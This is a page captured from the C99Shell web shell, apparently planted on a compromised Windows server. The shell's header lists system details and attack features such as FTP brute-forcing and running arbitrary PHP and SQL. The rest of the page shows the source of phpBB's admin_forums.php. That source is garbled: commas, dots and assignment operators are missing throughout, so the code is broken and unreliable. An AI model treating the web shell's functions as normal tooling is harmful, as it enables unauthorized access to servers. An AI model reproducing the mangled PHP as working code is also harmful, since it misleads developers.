!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\admin\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admin_forums.php (30.32 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/***************************************************************************
 *                             admin_forums.php
 *                            -------------------
 *   begin                : Thursday, Jul 12, 2001
 *   copyright            : (C) 2001 The phpBB Group
 *   email                : support@phpbb.com
 *
 *   $Id: admin_forums.php,v 1.2 2005/05/09 16:23:09 acydburn Exp $
 *
 ***************************************************************************/

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 ***************************************************************************/

define('IN_PHPBB'1);

if( !empty(
$setmodules) )
{
    
$file basename(__FILE__);
    
$module['Forums']['Manage'] = $file;
    return;
}

//
// Load default header
//
$phpbb_root_path "./../";
require(
$phpbb_root_path 'extension.inc');
require(
'./pagestart.' $phpEx);
include(
$phpbb_root_path 'includes/functions_admin.'.$phpEx);

$forum_auth_ary = array(
    
"auth_view" => AUTH_ALL
    
"auth_read" => AUTH_ALL
    
"auth_post" => AUTH_ALL
    
"auth_reply" => AUTH_ALL
    
"auth_edit" => AUTH_REG
    
"auth_delete" => AUTH_REG
    
"auth_sticky" => AUTH_MOD
    
"auth_announce" => AUTH_MOD
    
"auth_vote" => AUTH_REG
    
"auth_pollcreate" => AUTH_REG
);

$forum_auth_ary['auth_attachments'] = AUTH_REG;
$forum_auth_ary['auth_download'] = AUTH_REG;
//
// Mode setting
//
if( isset($HTTP_POST_VARS['mode']) || isset($HTTP_GET_VARS['mode']) )
{
    
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? $HTTP_POST_VARS['mode'] : $HTTP_GET_VARS['mode'];
    
$mode htmlspecialchars($mode);
}
else
{
    
$mode "";
}

// ------------------
// Begin function block
//
function get_info($mode$id)
{
    global 
$db;

    switch(
$mode)
    {
        case 
'category':
            
$table CATEGORIES_TABLE;
            
$idfield 'cat_id';
            
$namefield 'cat_title';
            break;

        case 
'forum':
            
$table FORUMS_TABLE;
            
$idfield 'forum_id';
            
$namefield 'forum_name';
            break;

        default:
            
message_die(GENERAL_ERROR"Wrong mode for generating select list"""__LINE____FILE__);
            break;
    }
    
$sql "SELECT count(*) as total
        FROM 
$table";
    if( !
$result $db->sql_query($sql) )
    {
        
message_die(GENERAL_ERROR"Couldn't get Forum/Category information"""__LINE____FILE__$sql);
    }
    
$count $db->sql_fetchrow($result);
    
$count $count['total'];

    
$sql "SELECT *
        FROM 
$table
        WHERE 
$idfield = $id"

    if( !
$result $db->sql_query($sql) )
    {
        
message_die(GENERAL_ERROR"Couldn't get Forum/Category information"""__LINE____FILE__$sql);
    }

    if( 
$db->sql_numrows($result) != )
    {
        
message_die(GENERAL_ERROR"Forum/Category doesn't exist or multiple forums/categories with ID $id"""__LINE____FILE__);
    }

    
$return $db->sql_fetchrow($result);
    
$return['number'] = $count;
    return 
$return;
}

function 
get_list($mode$id$select)
{
    global 
$db;

    switch(
$mode)
    {
        case 
'category':
            
$table CATEGORIES_TABLE;
            
$idfield 'cat_id';
            
$namefield 'cat_title';
            break;

        case 
'forum':
            
$table FORUMS_TABLE;
            
$idfield 'forum_id';
            
$namefield 'forum_name';
            break;

        default:
            
message_die(GENERAL_ERROR"Wrong mode for generating select list"""__LINE____FILE__);
            break;
    }

    
$sql "SELECT *
        FROM 
$table";
    if( 
$select == )
    {
        
$sql .= " WHERE $idfield <> $id";
    }

    if( !
$result $db->sql_query($sql) )
    {
        
message_die(GENERAL_ERROR"Couldn't get list of Categories/Forums"""__LINE____FILE__$sql);
    }

    
$cat_list "";

    while( 
$row $db->sql_fetchrow($result) )
    {
        
$s "";
        if (
$row[$idfield] == $id)
        {
            
$s " selected=\"selected\"";
        }
        
$catlist .= "<option value=\"$row[$idfield]\"$s>" $row[$namefield] . "</option>\n";
    }

    return(
$catlist);
}

function 
renumber_order($mode$cat 0)
{
    global 
$db;

    switch(
$mode)
    {
        case 
'category':
            
$table CATEGORIES_TABLE;
            
$idfield 'cat_id';
            
$orderfield 'cat_order';
            
$cat 0;
            break;

        case 
'forum':
            
$table FORUMS_TABLE;
            
$idfield 'forum_id';
            
$orderfield 'forum_order';
            
$catfield 'cat_id';
            break;

        default:
            
message_die(GENERAL_ERROR"Wrong mode for generating select list"""__LINE____FILE__);
            break;
    }

    
$sql "SELECT * FROM $table";
    if( 
$cat != 0)
    {
        
$sql .= " WHERE $catfield = $cat";
    }
    
$sql .= " ORDER BY $orderfield ASC";


    if( !
$result $db->sql_query($sql) )
    {
        
message_die(GENERAL_ERROR"Couldn't get list of Categories"""__LINE____FILE__$sql);
    }

    
$i 10;
    
$inc 10;

    while( 
$row $db->sql_fetchrow($result) )
    {
        
$sql "UPDATE $table
            SET 
$orderfield = $i
            WHERE 
$idfield = " $row[$idfield];
        if( !
$db->sql_query($sql) )
        {
            
message_die(GENERAL_ERROR"Couldn't update order fields"""__LINE____FILE__$sql);
        }
        
$i += 10;
    }

}
//
// End function block
// ------------------

//
// Begin program proper
//
if( isset($HTTP_POST_VARS['addforum']) || isset($HTTP_POST_VARS['addcategory']) )
{
    
$mode = ( isset($HTTP_POST_VARS['addforum']) ) ? "addforum" "addcat";

    if( 
$mode == "addforum" )
    {
        list(
$cat_id) = each($HTTP_POST_VARS['addforum']);
        
$cat_id intval($cat_id);
        
// 
        // stripslashes needs to be run on this because slashes are added when the forum name is posted
        //
        
$forumname stripslashes($HTTP_POST_VARS['forumname'][$cat_id]);
    }
}

if( !empty(
$mode) ) 
{
    switch(
$mode)
    {
        case 
'addforum':
        case 
'editforum':
            
//
            // Show form to create/modify a forum
            //
            
if ($mode == 'editforum')
            {
                
// $newmode determines if we are going to INSERT or UPDATE after posting?

                
$l_title $lang['Edit_forum'];
                
$newmode 'modforum';
                
$buttonvalue $lang['Update'];

                
$forum_id intval($HTTP_GET_VARS[POST_FORUM_URL]);

                
$row get_info('forum'$forum_id);

                
$cat_id $row['cat_id'];
                
$forumname $row['forum_name'];
                
$forumdesc $row['forum_desc'];
                
$forumstatus $row['forum_status'];

                
//
                // start forum prune stuff.
                //
                
if( $row['prune_enable'] )
                {
                    
$prune_enabled "checked=\"checked\"";
                    
$sql "SELECT *
                           FROM " 
PRUNE_TABLE "
                           WHERE forum_id = 
$forum_id";
                    if(!
$pr_result $db->sql_query($sql))
                    {
                         
message_die(GENERAL_ERROR"Auto-Prune: Couldn't read auto_prune table."__LINE____FILE__);
                    }

                    
$pr_row $db->sql_fetchrow($pr_result);
                }
                else
                {
                    
$prune_enabled '';
                }
            }
            else
            {
                
$l_title $lang['Create_forum'];
                
$newmode 'createforum';
                
$buttonvalue $lang['Create_forum'];

                
$forumdesc '';
                
$forumstatus FORUM_UNLOCKED;
                
$forum_id ''
                
$prune_enabled '';
            }

            
$catlist get_list('category'$cat_idTRUE);

            
$forumstatus == ( FORUM_LOCKED ) ? $forumlocked "selected=\"selected\"" $forumunlocked "selected=\"selected\"";
            
            
// These two options ($lang['Status_unlocked'] and $lang['Status_locked']) seem to be missing from
            // the language files.
            
$lang['Status_unlocked'] = isset($lang['Status_unlocked']) ? $lang['Status_unlocked'] : 'Unlocked';
            
$lang['Status_locked'] = isset($lang['Status_locked']) ? $lang['Status_locked'] : 'Locked';
            
            
$statuslist "<option value=\"" FORUM_UNLOCKED "\" $forumunlocked>" $lang['Status_unlocked'] . "</option>\n";
            
$statuslist .= "<option value=\"" FORUM_LOCKED "\" $forumlocked>" $lang['Status_locked'] . "</option>\n"

            
$template->set_filenames(array(
                
"body" => "admin/forum_edit_body.tpl")
            );

            
$s_hidden_fields '<input type="hidden" name="mode" value="' $newmode .'" /><input type="hidden" name="' POST_FORUM_URL '" value="' $forum_id '" />';

            
$template->assign_vars(array(
                
'S_FORUM_ACTION' => append_sid("admin_forums.$phpEx"),
                
'S_HIDDEN_FIELDS' => $s_hidden_fields,
                
'S_SUBMIT_VALUE' => $buttonvalue
                
'S_CAT_LIST' => $catlist,
                
'S_STATUS_LIST' => $statuslist,
                
'S_PRUNE_ENABLED' => $prune_enabled,

                
'L_FORUM_TITLE' => $l_title
                
'L_FORUM_EXPLAIN' => $lang['Forum_edit_delete_explain'], 
                
'L_FORUM_SETTINGS' => $lang['Forum_settings'], 
                
'L_FORUM_NAME' => $lang['Forum_name'], 
                
'L_CATEGORY' => $lang['Category'], 
                
'L_FORUM_DESCRIPTION' => $lang['Forum_desc'],
                
'L_FORUM_STATUS' => $lang['Forum_status'],
                
'L_AUTO_PRUNE' => $lang['Forum_pruning'],
                
'L_ENABLED' => $lang['Enabled'],
                
'L_PRUNE_DAYS' => $lang['prune_days'],
                
'L_PRUNE_FREQ' => $lang['prune_freq'],
                
'L_DAYS' => $lang['Days'],

                
'PRUNE_DAYS' => ( isset($pr_row['prune_days']) ) ? $pr_row['prune_days'] : 7,
                
'PRUNE_FREQ' => ( isset($pr_row['prune_freq']) ) ? $pr_row['prune_freq'] : 1,
                
'FORUM_NAME' => $forumname,
                
'DESCRIPTION' => $forumdesc)
            );
            
$template->pparse("body");
            break;

        case 
'createforum':
            
//
            // Create a forum in the DB
            //
            
if( trim($HTTP_POST_VARS['forumname']) == "" )
            {
                
message_die(GENERAL_ERROR"Can't create a forum without a name");
            }

            
$sql "SELECT MAX(forum_order) AS max_order
                FROM " 
FORUMS_TABLE "
                WHERE cat_id = " 
intval($HTTP_POST_VARS[POST_CAT_URL]);
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't get order number from forums table"""__LINE____FILE__$sql);
            }
            
$row $db->sql_fetchrow($result);

            
$max_order $row['max_order'];
            
$next_order $max_order 10;
            
            
$sql "SELECT MAX(forum_id) AS max_id
                FROM " 
FORUMS_TABLE;
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't get order number from forums table"""__LINE____FILE__$sql);
            }
            
$row $db->sql_fetchrow($result);

            
$max_id $row['max_id'];
            
$next_id $max_id 1;

            
//
            // Default permissions of public :: 
            //
            
$field_sql "";
            
$value_sql "";
            while( list(
$field$value) = each($forum_auth_ary) )
            {
                
$field_sql .= ", $field";
                
$value_sql .= ", $value";

            }

            
// There is no problem having duplicate forum names so we won't check for it.
            
$sql "INSERT INTO " FORUMS_TABLE " (forum_id, forum_name, cat_id, forum_desc, forum_order, forum_status, prune_enable" $field_sql ")
                VALUES ('" 
$next_id "', '" str_replace("\'""''"$HTTP_POST_VARS['forumname']) . "', " intval($HTTP_POST_VARS[POST_CAT_URL]) . ", '" str_replace("\'""''"$HTTP_POST_VARS['forumdesc']) . "', $next_order, " intval($HTTP_POST_VARS['forumstatus']) . ", " intval($HTTP_POST_VARS['prune_enable']) . $value_sql ")";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't insert row in forums table"""__LINE____FILE__$sql);
            }

            if( 
$HTTP_POST_VARS['prune_enable'] )
            {

                if( 
$HTTP_POST_VARS['prune_days'] == "" || $HTTP_POST_VARS['prune_freq'] == "")
                {
                    
message_die(GENERAL_MESSAGE$lang['Set_prune_data']);
                }

                
$sql "INSERT INTO " PRUNE_TABLE " (forum_id, prune_days, prune_freq)
                    VALUES('" 
$next_id "', " intval($HTTP_POST_VARS['prune_days']) . ", " intval($HTTP_POST_VARS['prune_freq']) . ")";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't insert row in prune table"""__LINE____FILE__$sql);
                }
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;

        case 
'modforum':
            
// Modify a forum in the DB
            
if( isset($HTTP_POST_VARS['prune_enable']))
            {
                if( 
$HTTP_POST_VARS['prune_enable'] != )
                {
                    
$HTTP_POST_VARS['prune_enable'] = 0;
                }
            }

            
$sql "UPDATE " FORUMS_TABLE "
                SET forum_name = '" 
str_replace("\'""''"$HTTP_POST_VARS['forumname']) . "', cat_id = " intval($HTTP_POST_VARS[POST_CAT_URL]) . ", forum_desc = '" str_replace("\'""''"$HTTP_POST_VARS['forumdesc']) . "', forum_status = " intval($HTTP_POST_VARS['forumstatus']) . ", prune_enable = " intval($HTTP_POST_VARS['prune_enable']) . "
                WHERE forum_id = " 
intval($HTTP_POST_VARS[POST_FORUM_URL]);
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't update forum information"""__LINE____FILE__$sql);
            }

            if( 
$HTTP_POST_VARS['prune_enable'] == )
            {
                if( 
$HTTP_POST_VARS['prune_days'] == "" || $HTTP_POST_VARS['prune_freq'] == "" )
                {
                    
message_die(GENERAL_MESSAGE$lang['Set_prune_data']);
                }

                
$sql "SELECT *
                    FROM " 
PRUNE_TABLE "
                    WHERE forum_id = " 
intval($HTTP_POST_VARS[POST_FORUM_URL]);
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't get forum Prune Information","",__LINE____FILE__$sql);
                }

                if( 
$db->sql_numrows($result) > )
                {
                    
$sql "UPDATE " PRUNE_TABLE "
                        SET    prune_days = " 
intval($HTTP_POST_VARS['prune_days']) . ",    prune_freq = " intval($HTTP_POST_VARS['prune_freq']) . "
                         WHERE forum_id = " 
intval($HTTP_POST_VARS[POST_FORUM_URL]);
                }
                else
                {
                    
$sql "INSERT INTO " PRUNE_TABLE " (forum_id, prune_days, prune_freq)
                        VALUES(" 
intval($HTTP_POST_VARS[POST_FORUM_URL]) . ", " intval($HTTP_POST_VARS['prune_days']) . ", " intval($HTTP_POST_VARS['prune_freq']) . ")";
                }

                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't Update Forum Prune Information","",__LINE____FILE__$sql);
                }
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;
            
        case 
'addcat':
            
// Create a category in the DB
            
if( trim($HTTP_POST_VARS['categoryname']) == '')
            {
                
message_die(GENERAL_ERROR"Can't create a category without a name");
            }

            
$sql "SELECT MAX(cat_order) AS max_order
                FROM " 
CATEGORIES_TABLE;
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't get order number from categories table"""__LINE____FILE__$sql);
            }
            
$row $db->sql_fetchrow($result);

            
$max_order $row['max_order'];
            
$next_order $max_order 10;

            
//
            // There is no problem having duplicate forum names so we won't check for it.
            //
            
$sql "INSERT INTO " CATEGORIES_TABLE " (cat_title, cat_order)
                VALUES ('" 
str_replace("\'""''"$HTTP_POST_VARS['categoryname']) . "', $next_order)";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't insert row in categories table"""__LINE____FILE__$sql);
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;
            
        case 
'editcat':
            
//
            // Show form to edit a category
            //
            
$newmode 'modcat';
            
$buttonvalue $lang['Update'];

            
$cat_id intval($HTTP_GET_VARS[POST_CAT_URL]);

            
$row get_info('category'$cat_id);
            
$cat_title $row['cat_title'];

            
$template->set_filenames(array(
                
"body" => "admin/category_edit_body.tpl")
            );

            
$s_hidden_fields '<input type="hidden" name="mode" value="' $newmode '" /><input type="hidden" name="' POST_CAT_URL '" value="' $cat_id '" />';

            
$template->assign_vars(array(
                
'CAT_TITLE' => $cat_title,

                
'L_EDIT_CATEGORY' => $lang['Edit_Category'], 
                
'L_EDIT_CATEGORY_EXPLAIN' => $lang['Edit_Category_explain'], 
                
'L_CATEGORY' => $lang['Category'], 

                
'S_HIDDEN_FIELDS' => $s_hidden_fields
                
'S_SUBMIT_VALUE' => $buttonvalue
                
'S_FORUM_ACTION' => append_sid("admin_forums.$phpEx"))
            );

            
$template->pparse("body");
            break;

        case 
'modcat':
            
// Modify a category in the DB
            
$sql "UPDATE " CATEGORIES_TABLE "
                SET cat_title = '" 
str_replace("\'""''"$HTTP_POST_VARS['cat_title']) . "'
                WHERE cat_id = " 
intval($HTTP_POST_VARS[POST_CAT_URL]);
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't update forum information"""__LINE____FILE__$sql);
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;
            
        case 
'deleteforum':
            
// Show form to delete a forum
            
$forum_id intval($HTTP_GET_VARS[POST_FORUM_URL]);

            
$select_to '<select name="to_id">';
            
$select_to .= "<option value=\"-1\"$s>" $lang['Delete_all_posts'] . "</option>\n";
            
$select_to .= get_list('forum'$forum_id0);
            
$select_to .= '</select>';

            
$buttonvalue $lang['Move_and_Delete'];

            
$newmode 'movedelforum';

            
$foruminfo get_info('forum'$forum_id);
            
$name $foruminfo['forum_name'];

            
$template->set_filenames(array(
                
"body" => "admin/forum_delete_body.tpl")
            );

            
$s_hidden_fields '<input type="hidden" name="mode" value="' $newmode '" /><input type="hidden" name="from_id" value="' $forum_id '" />';

            
$template->assign_vars(array(
                
'NAME' => $name

                
'L_FORUM_DELETE' => $lang['Forum_delete'], 
                
'L_FORUM_DELETE_EXPLAIN' => $lang['Forum_delete_explain'], 
                
'L_MOVE_CONTENTS' => $lang['Move_contents'], 
                
'L_FORUM_NAME' => $lang['Forum_name'], 

                
"S_HIDDEN_FIELDS" => $s_hidden_fields,
                
'S_FORUM_ACTION' => append_sid("admin_forums.$phpEx"), 
                
'S_SELECT_TO' => $select_to,
                
'S_SUBMIT_VALUE' => $buttonvalue)
            );

            
$template->pparse("body");
            break;

        case 
'movedelforum':
            
//
            // Move or delete a forum in the DB
            //
            
$from_id intval($HTTP_POST_VARS['from_id']);
            
$to_id intval($HTTP_POST_VARS['to_id']);
            
$delete_old intval($HTTP_POST_VARS['delete_old']);

            
// Either delete or move all posts in a forum
            
if($to_id == -1)
            {
                
// Delete polls in this forum
                
$sql "SELECT v.vote_id 
                    FROM " 
VOTE_DESC_TABLE " v, " TOPICS_TABLE " t 
                    WHERE t.forum_id = 
$from_id 
                        AND v.topic_id = t.topic_id"
;
                if (!(
$result $db->sql_query($sql)))
                {
                    
message_die(GENERAL_ERROR"Couldn't obtain list of vote ids"""__LINE____FILE__$sql);
                }

                if (
$row $db->sql_fetchrow($result))
                {
                    
$vote_ids '';
                    do
                    {
                        
$vote_ids = (($vote_ids != '') ? ', ' '') . $row['vote_id'];
                    }
                    while (
$row $db->sql_fetchrow($result));

                    
$sql "DELETE FROM " VOTE_DESC_TABLE 
                        WHERE vote_id IN (
$vote_ids)";
                    
$db->sql_query($sql);

                    
$sql "DELETE FROM " VOTE_RESULTS_TABLE 
                        WHERE vote_id IN (
$vote_ids)";
                    
$db->sql_query($sql);

                    
$sql "DELETE FROM " VOTE_USERS_TABLE 
                        WHERE vote_id IN (
$vote_ids)";
                    
$db->sql_query($sql);
                }
                
$db->sql_freeresult($result);
                
                include(
$phpbb_root_path "includes/prune.$phpEx");
                
prune($from_id0true); // Delete everything from forum
            
}
            else
            {
                
$sql "SELECT *
                    FROM " 
FORUMS_TABLE "
                    WHERE forum_id IN (
$from_id$to_id)";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't verify existence of forums"""__LINE____FILE__$sql);
                }

                if(
$db->sql_numrows($result) != 2)
                {
                    
message_die(GENERAL_ERROR"Ambiguous forum ID's"""__LINE____FILE__);
                }
                
$sql "UPDATE " TOPICS_TABLE "
                    SET forum_id = 
$to_id
                    WHERE forum_id = 
$from_id";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't move topics to other forum"""__LINE____FILE__$sql);
                }
                
$sql "UPDATE " POSTS_TABLE "
                    SET    forum_id = 
$to_id
                    WHERE forum_id = 
$from_id";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't move posts to other forum"""__LINE____FILE__$sql);
                }
                
sync('forum'$to_id);
            }

            
// Alter Mod level if appropriate - 2.0.4
            
$sql "SELECT ug.user_id 
                FROM " 
AUTH_ACCESS_TABLE " a, " USER_GROUP_TABLE " ug 
                WHERE a.forum_id <> 
$from_id 
                    AND a.auth_mod = 1
                    AND ug.group_id = a.group_id"
;
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't obtain moderator list"""__LINE____FILE__$sql);
            }

            if (
$row $db->sql_fetchrow($result))
            {
                
$user_ids '';
                do
                {
                    
$user_ids .= (($user_ids != '') ? ', ' '' ) . $row['user_id'];
                }
                while (
$row $db->sql_fetchrow($result));

                
$sql "SELECT ug.user_id 
                    FROM " 
AUTH_ACCESS_TABLE " a, " USER_GROUP_TABLE " ug 
                    WHERE a.forum_id = 
$from_id 
                        AND a.auth_mod = 1 
                        AND ug.group_id = a.group_id
                        AND ug.user_id NOT IN (
$user_ids)";
                if( !
$result2 $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't obtain moderator list"""__LINE____FILE__$sql);
                }
                    
                if (
$row $db->sql_fetchrow($result2))
                {
                    
$user_ids '';
                    do
                    {
                        
$user_ids .= (($user_ids != '') ? ', ' '' ) . $row['user_id'];
                    }
                    while (
$row $db->sql_fetchrow($result2));

                    
$sql "UPDATE " USERS_TABLE 
                        SET user_level = " 
USER 
                        WHERE user_id IN (
$user_ids
                            AND user_level <> " 
ADMIN;
                    
$db->sql_query($sql);
                }
                
$db->sql_freeresult($result);

            }
            
$db->sql_freeresult($result2);

            
$sql "DELETE FROM " FORUMS_TABLE "
                WHERE forum_id = 
$from_id";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't delete forum"""__LINE____FILE__$sql);
            }
            
            
$sql "DELETE FROM " AUTH_ACCESS_TABLE "
                WHERE forum_id = 
$from_id";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't delete forum"""__LINE____FILE__$sql);
            }
            
            
$sql "DELETE FROM " PRUNE_TABLE "
                WHERE forum_id = 
$from_id";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't delete forum prune information!"""__LINE____FILE__$sql);
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;
            
        case 
'deletecat':
            
//
            // Show form to delete a category
            //
            
$cat_id intval($HTTP_GET_VARS[POST_CAT_URL]);

            
$buttonvalue $lang['Move_and_Delete'];
            
$newmode 'movedelcat';
            
$catinfo get_info('category'$cat_id);
            
$name $catinfo['cat_title'];

            if (
$catinfo['number'] == 1)
            {
                
$sql "SELECT count(*) as total
                    FROM "
FORUMS_TABLE;
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't get Forum count"""__LINE____FILE__$sql);
                }
                
$count $db->sql_fetchrow($result);
                
$count $count['total'];

                if (
$count 0)
                {
                    
message_die(GENERAL_ERROR$lang['Must_delete_forums']);
                }
                else
                {
                    
$select_to $lang['Nowhere_to_move'];
                }
            }
            else
            {
                
$select_to '<select name="to_id">';
                
$select_to .= get_list('category'$cat_id0);
                
$select_to .= '</select>';
            }

            
$template->set_filenames(array(
                
"body" => "admin/forum_delete_body.tpl")
            );

            
$s_hidden_fields '<input type="hidden" name="mode" value="' $newmode '" /><input type="hidden" name="from_id" value="' $cat_id '" />';

            
$template->assign_vars(array(
                
'NAME' => $name

                
'L_FORUM_DELETE' => $lang['Forum_delete'], 
                
'L_FORUM_DELETE_EXPLAIN' => $lang['Forum_delete_explain'], 
                
'L_MOVE_CONTENTS' => $lang['Move_contents'], 
                
'L_FORUM_NAME' => $lang['Forum_name'], 
                
                
'S_HIDDEN_FIELDS' => $s_hidden_fields,
                
'S_FORUM_ACTION' => append_sid("admin_forums.$phpEx"), 
                
'S_SELECT_TO' => $select_to,
                
'S_SUBMIT_VALUE' => $buttonvalue)
            );

            
$template->pparse("body");
            break;

        case 
'movedelcat':
            
//
            // Move or delete a category in the DB
            //
            
$from_id intval($HTTP_POST_VARS['from_id']);
            
$to_id intval($HTTP_POST_VARS['to_id']);

            if (!empty(
$to_id))
            {
                
$sql "SELECT *
                    FROM " 
CATEGORIES_TABLE "
                    WHERE cat_id IN (
$from_id$to_id)";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't verify existence of categories"""__LINE____FILE__$sql);
                }
                if(
$db->sql_numrows($result) != 2)
                {
                    
message_die(GENERAL_ERROR"Ambiguous category ID's"""__LINE____FILE__);
                }

                
$sql "UPDATE " FORUMS_TABLE "
                    SET cat_id = 
$to_id
                    WHERE cat_id = 
$from_id";
                if( !
$result $db->sql_query($sql) )
                {
                    
message_die(GENERAL_ERROR"Couldn't move forums to other category"""__LINE____FILE__$sql);
                }
            }

            
$sql "DELETE FROM " CATEGORIES_TABLE ."
                WHERE cat_id = 
$from_id";
                
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't delete category"""__LINE____FILE__$sql);
            }

            
$message $lang['Forums_updated'] . "<br /><br />" sprintf($lang['Click_return_forumadmin'], "<a href=\"" append_sid("admin_forums.$phpEx") . "\">""</a>") . "<br /><br />" sprintf($lang['Click_return_admin_index'], "<a href=\"" append_sid("index.$phpEx?pane=right") . "\">""</a>");

            
message_die(GENERAL_MESSAGE$message);

            break;

        case 
'forum_order':
            
//
            // Change order of forums in the DB
            //
            
$move intval($HTTP_GET_VARS['move']);
            
$forum_id intval($HTTP_GET_VARS[POST_FORUM_URL]);

            
$forum_info get_info('forum'$forum_id);

            
$cat_id $forum_info['cat_id'];

            
$sql "UPDATE " FORUMS_TABLE "
                SET forum_order = forum_order + 
$move
                WHERE forum_id = 
$forum_id";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't change category order"""__LINE____FILE__$sql);
            }

            
renumber_order('forum'$forum_info['cat_id']);
            
$show_index TRUE;

            break;
            
        case 
'cat_order':
            
//
            // Change order of categories in the DB
            //
            
$move intval($HTTP_GET_VARS['move']);
            
$cat_id intval($HTTP_GET_VARS[POST_CAT_URL]);

            
$sql "UPDATE " CATEGORIES_TABLE "
                SET cat_order = cat_order + 
$move
                WHERE cat_id = 
$cat_id";
            if( !
$result $db->sql_query($sql) )
            {
                
message_die(GENERAL_ERROR"Couldn't change category order"""__LINE____FILE__$sql);
            }

            
renumber_order('category');
            
$show_index TRUE;

            break;

        case 
'forum_sync':
            
sync('forum'intval($HTTP_GET_VARS[POST_FORUM_URL]));
            
$show_index TRUE;

            break;

        default:
            
message_die(GENERAL_MESSAGE$lang['No_mode']);
            break;
    }

    if (
$show_index != TRUE)
    {
        include(
'./page_footer_admin.'.$phpEx);
        exit;
    }
}

//
// Start page proper
//
$template->set_filenames(array(
    
"body" => "admin/forum_admin_body.tpl")
);

$template->assign_vars(array(
    
'S_FORUM_ACTION' => append_sid("admin_forums.$phpEx"),
    
'L_FORUM_TITLE' => $lang['Forum_admin'], 
    
'L_FORUM_EXPLAIN' => $lang['Forum_admin_explain'], 
    
'L_CREATE_FORUM' => $lang['Create_forum'], 
    
'L_CREATE_CATEGORY' => $lang['Create_category'], 
    
'L_EDIT' => $lang['Edit'], 
    
'L_DELETE' => $lang['Delete'], 
    
'L_MOVE_UP' => $lang['Move_up'], 
    
'L_MOVE_DOWN' => $lang['Move_down'], 
    
'L_RESYNC' => $lang['Resync'])
);

$sql "SELECT cat_id, cat_title, cat_order
    FROM " 
CATEGORIES_TABLE "
    ORDER BY cat_order"
;
if( !
$q_categories $db->sql_query($sql) )
{
    
message_die(GENERAL_ERROR"Could not query categories list"""__LINE____FILE__$sql);
}

if( 
$total_categories $db->sql_numrows($q_categories) )
{
    
$category_rows $db->sql_fetchrowset($q_categories);

    
$sql "SELECT *
        FROM " 
FORUMS_TABLE "
        ORDER BY cat_id, forum_order"
;
    if(!
$q_forums $db->sql_query($sql))
    {
        
